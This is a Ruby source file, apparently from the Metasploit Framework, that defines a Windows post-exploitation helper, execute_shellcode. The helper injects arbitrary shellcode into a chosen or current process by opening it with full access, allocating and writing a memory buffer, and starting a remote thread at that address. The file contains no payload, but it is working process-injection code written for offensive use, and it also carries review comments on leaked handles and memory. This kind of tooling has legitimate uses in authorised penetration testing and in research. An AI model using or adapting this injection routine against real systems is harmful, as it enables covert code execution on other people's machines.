# -*- coding: binary -*-
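module Msf
class Post
module Windows

#
# Process-related helpers for Windows post modules. Only #execute_shellcode
# is defined here.
#
module Process

  #
  # Injects shellcode into a process and starts a thread that executes it.
  #
  # The target process is opened with PROCESS_ALL_ACCESS, a buffer of
  # +shellcode.length+ bytes is allocated in it (at +base_addr+ when given),
  # the buffer's protection is changed through the stdapi default, the
  # bytes are written, and a thread is created at the buffer's address.
  #
  # @param shellcode [String] The shellcode to execute
  # @param base_addr [Integer, nil] The base address at which to allocate
  #   the buffer; when nil the remote side picks the address
  # @param pid [Integer, nil] The process ID to inject to; when nil the
  #   session's own process ID is used
  #
  # @return [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread, false, nil]
  #   The created thread on success, +false+ if the shellcode could not be
  #   written completely, +nil+ if thread creation did not yield a Thread
  #
  def execute_shellcode(shellcode, base_addr=nil, pid=nil)
    pid ||= session.sys.process.getpid
    host = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)

    shell_addr =
      if base_addr.nil?
        host.memory.allocate(shellcode.length)
      else
        host.memory.allocate(shellcode.length, nil, base_addr)
      end

    # Only the address is passed; length and protection fall back to the
    # stdapi Memory#protect defaults, which are not visible in this file.
    host.memory.protect(shell_addr)

    # write returns the number of bytes actually written; an incomplete copy
    # must not be executed, so fail before creating the thread.
    if host.memory.write(shell_addr, shellcode) < shellcode.length
      vprint_error("Failed to write shellcode")
      return false
    end

    vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
    thread = host.thread.create(shell_addr, 0)

    # Return explicitly: a bare `nil` in this branch is discarded and the
    # non-Thread value would be handed back as if creation had succeeded.
    unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
      vprint_error("Unable to create thread")
      return nil
    end

    # NOTE(review): the process handle in `host` is never closed here and
    # the buffer is never freed on the failure paths; confirm whether the
    # returned thread depends on the handle before adding cleanup.
    thread
  end

end # Process
end # Windows
end # Post
end # Msf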